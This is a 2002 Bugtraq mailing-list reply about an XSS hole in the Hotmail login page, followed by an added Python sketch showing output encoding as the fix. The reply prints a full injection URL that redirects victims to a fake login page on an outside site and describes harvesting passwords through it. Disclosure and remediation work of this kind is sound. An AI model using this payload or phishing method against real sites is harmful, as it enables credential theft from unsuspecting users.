Bugtraq mailing list archives
Re: XSS bug in hotmail login page
From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Tue, 8 Oct 2002 05:11:29 -0700 (PDT)
A lot can happen for sure, but I tried one myself, to redirect the request to some other webpage. One can make a fake hotmail page asking for the password, storing it locally in a text file, and then again redirect to the original hotmail page. Using this method one could steal passwords of hotmail/MSN users.

We have all previously seen people making a hotmail-looking page, asking you to first login through it, or asking you to send your login/pass along with the login name of the person you want to get hacked (all nasty scams like that). Now if it is not fixed they will have an easy way to trick them by asking them to visit hotmail new policy at:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html");</script>&ct=1033054530&_setlang=

And then have a fake setup to trick them into entering their passwords at:

http://www.ownhomepage.com/frames/hotmailfake.html

Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202
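An added example, not part of the original post: the `">` at the start of the `cb` value suggests the login page copied that parameter into a quoted HTML attribute without encoding it. The sketch below assumes that pattern (the `<input>` markup and all function names are hypothetical, not Hotmail's code) and shows how HTML-encoding the value on output keeps the URL from the post inert.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote_plus

# URL exactly as given in the post above.
REPORTED_URL = (
    'http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb='
    '"><script>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html");'
    '</script>&ct=1033054530&_setlang='
)

def cb_param(url):
    """Return the decoded value of the cb query parameter."""
    pairs = dict(p.partition("=")[::2] for p in urlsplit(url).query.split("&"))
    return unquote_plus(pairs.get("cb", ""))

def render_unsafe(cb):
    # Assumed flaw: the value is copied verbatim into a quoted attribute.
    return '<input type="hidden" name="cb" value="%s">' % cb

def render_escaped(cb):
    # Fix: HTML-encode the value (quotes included) for the attribute context.
    return '<input type="hidden" name="cb" value="%s">' % html.escape(cb, quote=True)

class _Tags(HTMLParser):
    """Records every start tag the parser encounters."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    """List the elements an HTML parser actually sees in the markup."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    cb = cb_param(REPORTED_URL)
    print(tags_in(render_unsafe(cb)))   # attribute closed early, script element appears
    print(tags_in(render_escaped(cb)))  # only the input element remains
```
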
Current thread:
- XSS bug in hotmail login page Peter Rdam (Oct 07)
- <Possible follow-ups>
- RE: XSS bug in hotmail login page Thor Larholm (Oct 07)
- RE: XSS bug in hotmail login page Russell Harding (Oct 08)
- Re: XSS bug in hotmail login page Inderjeet S Sodhi (Oct 09)
- RE: XSS bug in hotmail login page Russell Harding (Oct 08)
- RE: XSS bug in hotmail login page Thor Larholm (Oct 08)
- Re: XSS bug in hotmail login page Muhammad Faisal Rauf Danka (Oct 08)
- Re: XSS bug in hotmail login page Berend-Jan Wever (Oct 08)